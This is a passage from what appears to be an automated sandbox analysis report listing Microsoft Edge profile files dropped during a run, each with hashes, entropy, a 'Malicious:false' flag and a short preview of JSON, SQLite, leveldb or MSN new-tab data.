Preview:{"file_hashes":[{"block_hashes":["OdZL4YFLwCTKbdslekC6/+U9KTtDUk+T+nnpVOeRzUc=","6RbL+qKART8FehO4s7U0u67iEI8/jaN+8Kg3kII+uy4=","CuN6+RcZAysZCfrzCZ8KdWDkQqyaIstSrcmsZ/c2MVs="],"block_size":4096,"path":"content.js"},{"block_hashes":["OdZL4YFLwCTKbdslekC6/+U9KTtDUk+T+nnpVOeRzUc=","UL53sQ5hOhAmII/Yx6muXikzahxM+k5gEmVOh7xJ3Rw=","u6MdmVNzBUfDzMwv2LEJ6pXR8k0nnvpYRwOL8aApwP8="],"block_size":4096,"path":"content_new.js"}],"version":2}
Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:data
Category:modified
Size (bytes):8720
Entropy (8bit):0.2191763562065486
Encrypted:false
SSDEEP:3:BtjtFlljq7A/mhWJFuQ3yy7IOWUf24t4dweytllrE9SFcTp4AGbNCV9RUIh4:BC75fO12hd0Xi99pEY74
MD5:BBB7FE55D4B6CF87EF7BAE25669C469C
SHA1:953A06FA1067C46A9AEDE6E2B7E1B5386333AB0E
SHA-256:7ED4CAFE84197EA3CC507B585843046D530A92535224AD9065F01C5095DBC9B8
SHA-512:96177423200FC7B6267EBDBDF493219BC4E3A510824993E9FB2F8AE542B05F5655855B147C98DD3F5F46A4895573F166399498EE667B967EEBA33A0A1777E01D
Malicious:false
Preview:............:......&....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:ASCII text, with very long lines (1597), with CRLF line terminators
Category:dropped
Size (bytes):115717
Entropy (8bit):5.183660917461099
Encrypted:false
SSDEEP:1536:utDURN77GZqW3v6PD/469IxVBmB22q7LRks3swn0:utAaE2Jt0
MD5:3D8183370B5E2A9D11D43EBEF474B305
SHA1:155AB0A46E019E834FA556F3D818399BFF02162B
SHA-256:6A30BADAD93601FC8987B8239D8907BCBE65E8F1993E4D045D91A77338A2A5B4
SHA-512:B7AD04F10CD5DE147BDBBE2D642B18E9ECB2D39851BE1286FDC65FF83985EA30278C95263C98999B6D94683AE1DB86436877C30A40992ACA1743097A2526FE81
Malicious:false
Preview:{.. "current_locale": "en-GB",.. "hub_apps": [ {.. "auto_show": {.. "enabled": true,.. "fre_notification": {.. "enabled": true,.. "header": "Was opening this pane helpful to you?",.. "show_count": 2,.. "text": "Was opening this pane helpful to you?".. },.. "settings_description": "We'll automatically open Bing Chat in the sidebar to show you relevant web experiences alongside your web content",.. "settings_title": "Automatically open Bing Chat in the sidebar",.. "triggering_configs|flight:msHubAppsMsnArticleAutoShowTriggering": [ {.. "show_count_basis": "signal",.. "signal_name": "IsMsnArticleAutoOpenFromP1P2",.. "signal_threshold": 0.5.. } ],.. "triggering_configs|flight:msUndersidePersistentChat": [ {.. "signal_name": "IsUndersidePersistentChatLink",.. "signal_threshold": 0.5.. } ],.. "triggering_co
Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 7, database pages 12, cookie 0x3, schema 4, UTF-8, version-valid-for 7
Category:dropped
Size (bytes):49152
Entropy (8bit):3.6481013572779455
Encrypted:false
SSDEEP:384:aj9P0WcAjlUP/KbtZ773pLwgam6IYhfQkQerIRKToaAu:adYKlUP/w7xoJe2IRKcC
MD5:D81C8BE11AD38618AE9661104064DD28
SHA1:D0CFBB1A58CC1C831076E87B7E1853F67FE1800F
SHA-256:8C72A234D67C28E269D5434FB9F10AA4E4794BBE63B97169F268ECCE8A1998EA
SHA-512:CCD28723CCA62FD6D94B3B8C04A77B9A184B3B0061F9FFA9CCC277FFE1102A4C48B55C51BAC3C5205F182D6624972E2B5CCBB88DDAE8961A677C99F3C8D4990F
Malicious:false
Preview:SQLite format 3......@ ..........................................................................j..........g...:.8....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:ASCII text
Category:dropped
Size (bytes):411
Entropy (8bit):5.287536196347891
Encrypted:false
SSDEEP:12:7sevLZYeb8rcHEZrELFUtn/H54ZYeb8rcHEZrEZSJ:7s8lYeb8nZrExgxoYeb8nZrEZe
MD5:4BBD7BD0E3FABBAE0FCA6A4988D83316
SHA1:C466512189828DCF3E9C1239BC4B3A6DD6264868
SHA-256:E311870854B567A4770CCDA4CB072335AF953A33F0352EB77CA2FE5B79BD4329
SHA-512:B6A7F43F2C7CDD2111411718D18AD742910722142B865AE83D3C29446623CF733EF8975F8A4946A8545B7BE7E2BAD355465B420B29C222A89159C0C9518F34E0
Malicious:false
Preview:2025/01/09-08:42:31.690 680 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Extension Settings\jdiccldimpdaibmpdkjnbmckianbfold/MANIFEST-000001.2025/01/09-08:42:31.691 680 Recovering log #3.2025/01/09-08:42:31.691 680 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Extension Settings\jdiccldimpdaibmpdkjnbmckianbfold/000003.log .
Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:ASCII text
Category:dropped
Size (bytes):411
Entropy (8bit):5.287536196347891
Encrypted:false
SSDEEP:12:7sevLZYeb8rcHEZrELFUtn/H54ZYeb8rcHEZrEZSJ:7s8lYeb8nZrExgxoYeb8nZrEZe
MD5:4BBD7BD0E3FABBAE0FCA6A4988D83316
SHA1:C466512189828DCF3E9C1239BC4B3A6DD6264868
SHA-256:E311870854B567A4770CCDA4CB072335AF953A33F0352EB77CA2FE5B79BD4329
SHA-512:B6A7F43F2C7CDD2111411718D18AD742910722142B865AE83D3C29446623CF733EF8975F8A4946A8545B7BE7E2BAD355465B420B29C222A89159C0C9518F34E0
Malicious:false
Preview:2025/01/09-08:42:31.690 680 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Extension Settings\jdiccldimpdaibmpdkjnbmckianbfold/MANIFEST-000001.2025/01/09-08:42:31.691 680 Recovering log #3.2025/01/09-08:42:31.691 680 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Extension Settings\jdiccldimpdaibmpdkjnbmckianbfold/000003.log .
Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:data
Category:dropped
Size (bytes):1601
Entropy (8bit):5.590582661146252
Encrypted:false
SSDEEP:48:dZuUUTK7XZTRV03Sx497AHHk2GJ348yls+yG:dMLTKjhBZdP8osY
MD5:D8DD5CC3E24D74F8BF1826D58B3237E3
SHA1:5E18E343DDB78E30F7891F5A81B18E6BFF6445A3
SHA-256:701BA7F1D4FE20AC28F983FB0CFAD3F0DA0557AF5D4CF1ABF446EABCB5B6B347
SHA-512:72F47BBC4D0D8C7E365EAA1FF9281811BD7CE187A8477E70438023437C788ECD8F986CEBC30BFCC2FD161FA128F9175FD7C24089D4A27FAC0CBD904AE16365AB
Malicious:false
Preview:.D..:................VERSION.1..META:https://ntp.msn.com.............._https://ntp.msn.com..FallbackNavigationResult?.{"r":"edgenext-base-v1-empty. NetworkCall","ic":true,"te":363}.!_https://ntp.msn.com..LastKnownPV..1736430156896.-_https://ntp.msn.com..LastVisuallyReadyMarker..1736430157996.._https://ntp.msn.com..MUID!.0E823CD872A76198161729B773BE609A.._https://ntp.msn.com..bkgdV...{"cachedVideoId":-1,"lastUpdatedTime":1736430156974,"schedule":[21,36,-1,-1,-1,22,-1],"scheduleFixed":[21,36,-1,-1,-1,22,-1],"simpleSchedule":[38,14,16,46,13,30,9]}.%_https://ntp.msn.com..clean_meta_flag..1.5_https://ntp.msn.com..enableUndersideAutoOpenFromEdge..false.7_https://ntp.msn.com..nurturing_interaction_trace_ls_id..1736430156866.&_https://ntp.msn.com..oneSvcUniTunMode..header."_https://ntp.msn.com..pageVersions..{"dhp":"20250109.199"}.*_https://ntp.msn.com..pivotSelectionSource..sticky.#_https://ntp.msn.com..selectedPivot..myFeed.5_https://ntp.msn.com..ssrBasePageCachingFeatureActive..true.#_http
Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:ASCII text
Category:dropped
Size (bytes):339
Entropy (8bit):5.170716885163237
Encrypted:false
SSDEEP:6:iOrvREV1yq2PcNwi23oH+Tcwt8a2jMGIFUtJvREKFZz1ZmwPvREvRkwOcNwi23oL:7mV1yvLZYeb8EFUtEc/SvR54ZYeb8bJ
MD5:E90D6E3DD70E2CABF1ED6BE5CBC2DDF5
SHA1:77CC6227E308F1CDF7A6DEEF875C01024AF0F97E
SHA-256:C0F0E486C2C98D455CC1352DEB2626EF3E09A055A007DBC420C3DCD6C1FF6132
SHA-512:5F15AEF324253075C04843C70D413813C8E97C6AAECA1BCED1BF1F0D368028014869DD42F82BA8D22C9A881E78286E988B3EF7AF3F1F556C71E00BA938D49285
Malicious:false
Preview:2025/01/09-08:42:29.211 770 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Storage\leveldb/MANIFEST-000001.2025/01/09-08:42:29.212 770 Recovering log #3.2025/01/09-08:42:29.215 770 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Storage\leveldb/000003.log .
Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:ASCII text
Category:dropped
Size (bytes):339
Entropy (8bit):5.170716885163237
Encrypted:false
SSDEEP:6:iOrvREV1yq2PcNwi23oH+Tcwt8a2jMGIFUtJvREKFZz1ZmwPvREvRkwOcNwi23oL:7mV1yvLZYeb8EFUtEc/SvR54ZYeb8bJ
MD5:E90D6E3DD70E2CABF1ED6BE5CBC2DDF5
SHA1:77CC6227E308F1CDF7A6DEEF875C01024AF0F97E
SHA-256:C0F0E486C2C98D455CC1352DEB2626EF3E09A055A007DBC420C3DCD6C1FF6132
SHA-512:5F15AEF324253075C04843C70D413813C8E97C6AAECA1BCED1BF1F0D368028014869DD42F82BA8D22C9A881E78286E988B3EF7AF3F1F556C71E00BA938D49285
Malicious:false
Preview:2025/01/09-08:42:29.211 770 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Storage\leveldb/MANIFEST-000001.2025/01/09-08:42:29.212 770 Recovering log #3.2025/01/09-08:42:29.215 770 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Storage\leveldb/000003.log .
Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:JSON data
Category:dropped
Size (bytes):2
Entropy (8bit):1.0
Encrypted:false
SSDEEP:3:H:H
MD5:D751713988987E9331980363E24189CE
SHA1:97D170E1550EEE4AFC0AF065B78CDA302A97674C
SHA-256:4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
SHA-512:B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
Malicious:false
Preview:[]
Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:JSON data
Category:dropped
Size (bytes):2
Entropy (8bit):1.0
Encrypted:false
SSDEEP:3:H:H
MD5:D751713988987E9331980363E24189CE
SHA1:97D170E1550EEE4AFC0AF065B78CDA302A97674C
SHA-256:4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
SHA-512:B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
Malicious:false
Preview:[]
Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:JSON data
Category:dropped
Size (bytes):2
Entropy (8bit):1.0
Encrypted:false
SSDEEP:3:H:H
MD5:D751713988987E9331980363E24189CE
SHA1:97D170E1550EEE4AFC0AF065B78CDA302A97674C
SHA-256:4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
SHA-512:B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
Malicious:false
Preview:[]
Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:JSON data
Category:dropped
Size (bytes):2
Entropy (8bit):1.0
Encrypted:false
SSDEEP:3:H:H
MD5:D751713988987E9331980363E24189CE
                                                                                                                                                                SHA1:97D170E1550EEE4AFC0AF065B78CDA302A97674C
                                                                                                                                                                SHA-256:4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
                                                                                                                                                                SHA-512:B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
                                                                                                                                                                Malicious:false
                                                                                                                                                                Preview:[]
                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 8, database pages 5, cookie 0x5, schema 4, UTF-8, version-valid-for 8
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):20480
                                                                                                                                                                Entropy (8bit):2.812709303165155
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:192:tTrAccFgbMKiadv9hDT2sN3jxGwFk3JkmPoVo9ZMGjMStokXhMHLW0c4p0L/ZJVb:V8NMTh5AwFq7P6S0lp0LhJVb
                                                                                                                                                                MD5:B04E9F8275793FB8FFE52F6E1F40BEF9
                                                                                                                                                                SHA1:2B17AA7E1B239D7FC67BAADC51477F0827337713
                                                                                                                                                                SHA-256:90C4CD006D52D73E0DDF8E594F71651E518C54E92D3BB0C9929FB397AFD41A80
                                                                                                                                                                SHA-512:D9E752F0AA28859CB7EC275D76FC685BD5B9816F3DC2774A8D4F1C9A5F7132CAF22F909140BD340DCA75653A6C4573FEAA6BD3A27625E2D90C808E0312719443
                                                                                                                                                                Malicious:false
                                                                                                                                                                Preview:SQLite format 3......@ ..........................................................................j...$......g..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 7, database pages 9, cookie 0x4, schema 4, UTF-8, version-valid-for 7
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):36864
                                                                                                                                                                Entropy (8bit):1.3766839309333772
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:48:TFkIopKWurJNVr1GJmA8pv82pfurJNVrdHXuccaurJN2VrJ1n4n1GmzNGU1cS2Wb:JkIEumQv8m1ccnvSfDHlGFh5d3Bw1a
                                                                                                                                                                MD5:FF32C5402FFD1390F21B19B9D501CF72
                                                                                                                                                                SHA1:26C39F966EA41A398EDDB58F0FB8FC810B66EAB1
                                                                                                                                                                SHA-256:08DCD239D4AB1AC5B3F2D347C24DA805E1D4579244F1E35C8A8AA4F00B34F093
                                                                                                                                                                SHA-512:72711A6A1FBA5A51E69BAED56CD7FCC64B0074EBC75F3ACAAF8D5D858DE45154E2780AAD9B05BE8353740FADCD4C90CF6148073AEBBA6D24A306B0C60330C527
                                                                                                                                                                Malicious:false
                                                                                                                                                                Preview:SQLite format 3......@ ..........................................................................j..........g...D.........7............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                File Type:JSON data
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):2
                                                                                                                                                                Entropy (8bit):1.0
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:3:H:H
                                                                                                                                                                MD5:D751713988987E9331980363E24189CE
                                                                                                                                                                SHA1:97D170E1550EEE4AFC0AF065B78CDA302A97674C
                                                                                                                                                                SHA-256:4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
                                                                                                                                                                SHA-512:B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
                                                                                                                                                                Malicious:false
                                                                                                                                                                Preview:[]
                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                File Type:JSON data
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):2
                                                                                                                                                                Entropy (8bit):1.0
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:3:H:H
                                                                                                                                                                MD5:D751713988987E9331980363E24189CE
                                                                                                                                                                SHA1:97D170E1550EEE4AFC0AF065B78CDA302A97674C
                                                                                                                                                                SHA-256:4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
                                                                                                                                                                SHA-512:B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
                                                                                                                                                                Malicious:false
                                                                                                                                                                Preview:[]
                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                File Type:JSON data
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):2
                                                                                                                                                                Entropy (8bit):1.0
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:3:H:H
                                                                                                                                                                MD5:D751713988987E9331980363E24189CE
                                                                                                                                                                SHA1:97D170E1550EEE4AFC0AF065B78CDA302A97674C
                                                                                                                                                                SHA-256:4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
                                                                                                                                                                SHA-512:B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
                                                                                                                                                                Malicious:false
                                                                                                                                                                Preview:[]
                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                File Type:JSON data
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):2
                                                                                                                                                                Entropy (8bit):1.0
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:3:H:H
                                                                                                                                                                MD5:D751713988987E9331980363E24189CE
                                                                                                                                                                SHA1:97D170E1550EEE4AFC0AF065B78CDA302A97674C
                                                                                                                                                                SHA-256:4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
                                                                                                                                                                SHA-512:B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
                                                                                                                                                                Malicious:false
                                                                                                                                                                Preview:[]
                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                File Type:JSON data
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):40
                                                                                                                                                                Entropy (8bit):4.1275671571169275
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:3:Y2ktGMxkAXWMSN:Y2xFMSN
                                                                                                                                                                MD5:20D4B8FA017A12A108C87F540836E250
                                                                                                                                                                SHA1:1AC617FAC131262B6D3CE1F52F5907E31D5F6F00
                                                                                                                                                                SHA-256:6028BD681DBF11A0A58DDE8A0CD884115C04CAA59D080BA51BDE1B086CE0079D
                                                                                                                                                                SHA-512:507B2B8A8A168FF8F2BDAFA5D9D341C44501A5F17D9F63F3D43BD586BC9E8AE33221887869FA86F845B7D067CB7D2A7009EFD71DDA36E03A40A74FEE04B86856
                                                                                                                                                                Malicious:false
                                                                                                                                                                Preview:{"SDCH":{"dictionaries":{},"version":2}}
                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                File Type:JSON data
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):40
                                                                                                                                                                Entropy (8bit):4.1275671571169275
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:3:Y2ktGMxkAXWMSN:Y2xFMSN
                                                                                                                                                                MD5:20D4B8FA017A12A108C87F540836E250
                                                                                                                                                                SHA1:1AC617FAC131262B6D3CE1F52F5907E31D5F6F00
                                                                                                                                                                SHA-256:6028BD681DBF11A0A58DDE8A0CD884115C04CAA59D080BA51BDE1B086CE0079D
                                                                                                                                                                SHA-512:507B2B8A8A168FF8F2BDAFA5D9D341C44501A5F17D9F63F3D43BD586BC9E8AE33221887869FA86F845B7D067CB7D2A7009EFD71DDA36E03A40A74FEE04B86856
                                                                                                                                                                Malicious:false
                                                                                                                                                                Preview:{"SDCH":{"dictionaries":{},"version":2}}
                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 3, database pages 5, cookie 0x2, schema 4, UTF-8, version-valid-for 3
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):20480
                                                                                                                                                                Entropy (8bit):0.8350301952073809
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:24:TLSOUOq0afDdWec9sJlAMoqsgC7zn2z8ZI7J5fc:T+OUzDbg3sAM/sgCnn2ztc
                                                                                                                                                                MD5:0DAD8D7F079797377CD56DAE47E1A619
                                                                                                                                                                SHA1:A353C01C5B9BA9E0315ABA74D3337B7D6EE97CB2
                                                                                                                                                                SHA-256:7BDA584E0C1BE9E104065370FD279A7E771D7EB4F7E4CC7C80F146931F150E33
                                                                                                                                                                SHA-512:5A57C0D303672564DDEAA08B5DAAEE1BA24B67C46100720CE69F0908427ACE55F330D96A772D0E1F96B595FBBD70E6145AA464FC4F312EFE095F9AC909E304E8
                                                                                                                                                                Malicious:false
                                                                                                                                                                Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                File Type:JSON data
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):13579
                                                                                                                                                                Entropy (8bit):5.2294340074227135
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:192:st/J99QTryDigabatSuypBsHsHyaNP9kpSYCBKs8IbV+FmWQwW9ZPoYJ:st/PGKSu4BsMHtJ7bGnQwI
                                                                                                                                                                MD5:8CFF09EAA1EE613FDE28851350D9577B
                                                                                                                                                                SHA1:E95C2F3DE45FD2EEF8DB9FB37C84631CD971E999
                                                                                                                                                                SHA-256:1B209DFBC00A17350B5253337E8D975D5F21065A955325279ECB4F9D8341C052
                                                                                                                                                                SHA-512:8A2FADED12FE3F1E38E65039B647C13BD40ACDDA214E9BE8E5228EA401A6EA642A7FF8CE06BEAF66D8A2A617C0C8AFE67BA5558162EB4ACD54030B55DA249DAE
                                                                                                                                                                Malicious:false
                                                                                                                                                                Preview:{"aadc_info":{"age_group":0},"account_tracker_service_last_update":"13380903748641376","alternate_error_pages":{"backup":true},"apps":{"shortcuts_arch":"","shortcuts_version":0},"arbitration_experiences":{},"arbitration_local_nsat_reset_time":"13340965831357520","arbitration_using_experiment_config":false,"autocomplete":{"retention_policy_last_version":117},"browser":{"available_dark_theme_options":"All","has_seen_welcome_page":false,"history_in_shoreline_activated":true,"hub_app_non_synced_preferences":{"apps":{"06be1ebe-f23a-4bea-ae45-3120ad86cfea":{"last_path":""},"0c835d2d-9592-4c7a-8d0a-0e283c9ad3cd":{"last_path":""},"168a2510-04d5-473e-b6a0-828815a7ca5f":{"last_path":""},"1ec8a5a9-971c-4c82-a104-5e1a259456b8":{"last_path":""},"2354565a-f412-4654-b89c-f92eaa9dbd20":{"last_path":""},"25fe2d1d-e934-482a-a62f-ea1705db905d":{"last_path":""},"2caf0cf4-ea42-4083-b928-29b39da1182b":{"last_path":""},"2cb2db96-3bd0-403e-abe2-9269b3761041":{"last_path":""},"35a43603-bb38-4b53-ba20-932cb9117
                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                File Type:JSON data
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):35113
                                                                                                                                                                Entropy (8bit):5.555704209770109
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:768:iR2bPnpWP7Pf4h8F1+UoAYDCx9Tuqh0VfUC9xbog/OVPhGXfrwIK0WuqKpQtuj:iR2bPnpWP7Pf4hu1ja+kXsIK0Wr1tE
                                                                                                                                                                MD5:4DA99C2332B3CB18AB31DBFF80EB9E77
                                                                                                                                                                SHA1:0F77BB1A1925E717C4BF499ADE5828FE1572D2C2
                                                                                                                                                                SHA-256:04C73F86469A3B2EB3A97424C9E18A480BF52E0516F00B9C11E146B01A1BF1F2
                                                                                                                                                                SHA-512:5CC6E48D9614601B23C60B87E0967164263FE7CBD019AC7B255C7E81385E28722221F1A516E6F325084E6036DFF4189A1F31C68D9869EAC24B570837C7D4600F
                                                                                                                                                                Malicious:false
                                                                                                                                                                Preview:{"edge_fundamentals_appdefaults":{"ess_lightweight_version":101},"ess_kv_states":{"restore_on_startup":{"closed_notification":false,"decrypt_success":true,"key":"restore_on_startup","notification_popup_count":0},"startup_urls":{"closed_notification":false,"decrypt_success":true,"key":"startup_urls","notification_popup_count":0},"template_url_data":{"closed_notification":false,"decrypt_success":true,"key":"template_url_data","notification_popup_count":0}},"extensions":{"settings":{"ahfgeienlihckogmohjhadlkjgocpleb":{"active_permissions":{"api":["management","system.display","system.storage","webstorePrivate","system.cpu","system.memory","system.network"],"explicit_host":[],"manifest_permissions":[],"scriptable_host":[]},"app_launcher_ordinal":"t","commands":{},"content_settings":[],"creation_flags":1,"events":[],"first_install_time":"13380903748127814","from_webstore":false,"incognito_content_settings":[],"incognito_preferences":{},"last_update_time":"13380903748127814","location":5,"ma
                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):16
                                                                                                                                                                Entropy (8bit):3.2743974703476995
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:3:1sjgWIV//Uv:1qIFUv
                                                                                                                                                                MD5:46295CAC801E5D4857D09837238A6394
                                                                                                                                                                SHA1:44E0FA1B517DBF802B18FAF0785EEEA6AC51594B
                                                                                                                                                                SHA-256:0F1BAD70C7BD1E0A69562853EC529355462FCD0423263A3D39D6D0D70B780443
                                                                                                                                                                SHA-512:8969402593F927350E2CEB4B5BC2A277F3754697C1961E3D6237DA322257FBAB42909E1A742E22223447F3A4805F8D8EF525432A7C3515A549E984D3EFF72B23
                                                                                                                                                                Malicious:false
                                                                                                                                                                Preview:MANIFEST-000001.
                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                File Type:data
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):2394
                                                                                                                                                                Entropy (8bit):5.817571625143444
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:48:F2emPMrd6/fBkYrdey0dyrd6aBkJrdcBkn:F1mPMx6/GYxyyx6JJxrn
                                                                                                                                                                MD5:B63208F12D122BD6D9F45BA1BD314C58
                                                                                                                                                                SHA1:241CBAA858E0DBC21E1C730E5DDB2B89AE8459E1
                                                                                                                                                                SHA-256:029D79536DF167CBF6E7902FAFA4B7946BF1417D2ECEB224EC98CFE06B4D75DC
                                                                                                                                                                SHA-512:379D1C1FC827B4F1401F6CD4AFDC6966F11FE5BA3552A65A2DE7E1071B555B9A606B1F10BD29AEE7FB8590983B718BADDA989C70F9CCFD12C6E611DB61BDA53B
                                                                                                                                                                Malicious:false
                                                                                                                                                                Preview:....I................URES:0...INITDATA_NEXT_RESOURCE_ID.1..INITDATA_DB_VERSION.2.#...................INITDATA_NEXT_REGISTRATION_ID.1..INITDATA_NEXT_VERSION_ID.1.+INITDATA_UNIQUE_ORIGIN:https://ntp.msn.com/...REG:https://ntp.msn.com/.0......https://ntp.msn.com/edge/ntp...https://ntp.msn.com/edge/ntp/service-worker.js?bundles=latest&riverAgeMinutes=2880&navAgeMinutes=2880&networkTimeoutSeconds=5&bgTaskNetworkTimeoutSeconds=8&ssrBasePageNavAgeMinutes=360&enableEmptySectionRoute=true&enableNavPreload=true&enableFallbackVerticalsFeed=true&noCacheLayoutTemplates=true&cacheSSRBasePageResponse=true&enableStaticAdsRouting=true&enableWidgetsRegion=true .(.0.8......@...Z.b.....trueh..h..h..h..h..h..h..h..h..h..h.!p.x................................REGID_TO_ORIGIN:0.https://ntp.msn.com/..RES:0.0.......https://ntp.msn.com/edge/ntp/service-worker.js?bundles=latest&riverAgeMinutes=2880&navAgeMinutes=2880&networkTimeoutSeconds=5&bgTaskNetworkTimeoutSeconds=8&ssrBasePageNavAgeMinutes=360&enableEmpt
                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                File Type:ASCII text
